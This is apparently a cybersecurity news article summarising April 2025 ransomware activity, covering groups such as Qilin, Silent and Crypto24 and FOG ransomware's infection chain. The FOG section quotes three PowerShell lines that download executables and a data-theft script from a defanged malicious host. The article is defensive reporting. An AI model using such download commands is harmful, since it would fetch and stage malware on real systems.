April 2025 witnessed a notable shift in the global ransomware landscape, with 470 reported victims worldwide representing a significant 29% decrease from March.
Despite this numerical decline, ransomware operations continue to demonstrate increased sophistication and strategic targeting, indicating that threat actors are becoming more selective rather than less active.
The manufacturing sector bore the brunt of these attacks, followed closely by the information technology industry, with the United States remaining the primary geographical target for cybercriminals.
Qilin has firmly established itself as the dominant ransomware group in this evolving landscape, recording a remarkable 71.4% increase in activity compared to the previous month.
With 72 confirmed victims, Qilin’s rapid ascension signals a worrying trend of accelerated capabilities and expanding infrastructure.
Other established groups showing significant growth include Play with a 75.9% activity increase and DragonForce with a more moderate 25% growth, illustrating the dynamic nature of the current threat environment.
Cyfirma researchers identified several emerging ransomware groups making their debut on the threat landscape during April 2025.
Most notable among these new entrants are Silent and Crypto24, which have quickly established their presence with distinctive operational approaches.
The sudden emergence of these groups coincides with the unexpected shutdown of RansomHub, suggesting a possible redistribution of technical talent and resources across the ransomware ecosystem.
The Silent ransomware group, which launched its leak site in late April, has distinguished itself with a unique operational methodology.
Unlike traditional ransomware operators that focus primarily on encryption, Silent claims to prioritize data theft, targeting valuable confidential corporate information that can be sold to competitors or on darkweb marketplaces.
With four confirmed victims already, the group emphasizes discretion and anonymity, minimizing the amount of data encrypted to reduce detection while maximizing leverage through stolen information.
Meanwhile, Crypto24 has established itself with greater aggression, claiming eight victims worldwide since its emergence.
This group appears to be taking advantage of the vacuum left by RansomHub’s departure, potentially absorbing former affiliates seeking new operational platforms.
FOG Ransomware’s Sophisticated Infection Chain
The technical sophistication of current ransomware is exemplified by FOG, which utilizes a multi-stage infection process that begins with phishing emails containing a ZIP archive named “Pay Adjustment.zip.”
This archive contains a malicious LNK file that executes a PowerShell script (“stage1.ps1”) responsible for downloading additional components:-
Invoke-WebRequest -Uri "hxxp://malicious-domain[.]com/cwiper.exe" -OutFile "$env:TEMP\cwiper.exe"
Invoke-WebRequest -Uri "hxxp://malicious-domain[.]com/ktool.exe" -OutFile "$env:TEMP\ktool.exe"
Invoke-WebRequest -Uri "hxxp://malicious-domain[.]com/lootsubmit.ps1" -OutFile "$env:TEMP\lootsubmit.ps1"The infection chain includes a privilege escalation tool (ktool.exe) that exploits a vulnerability in iQVW64.sys driver, and data-harvesting scripts that collect system details and geolocation data.
Before execution, the ransomware performs environment checks to detect virtualization, avoiding sandbox environments commonly used for malware analysis.
Upon encryption, files receive the “.flocked” extension, and a ransom note (readme.txt) containing politically themed messaging is dropped.
Uniquely, victims are instructed to further propagate the malware, a social engineering tactic that differentiates FOG from more traditional ransomware operations.
With ransomware groups continuously evolving their tactics and techniques, organizations must remain vigilant and implement comprehensive security measures to protect against these sophisticated threats that show no signs of abating in 2025.
Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.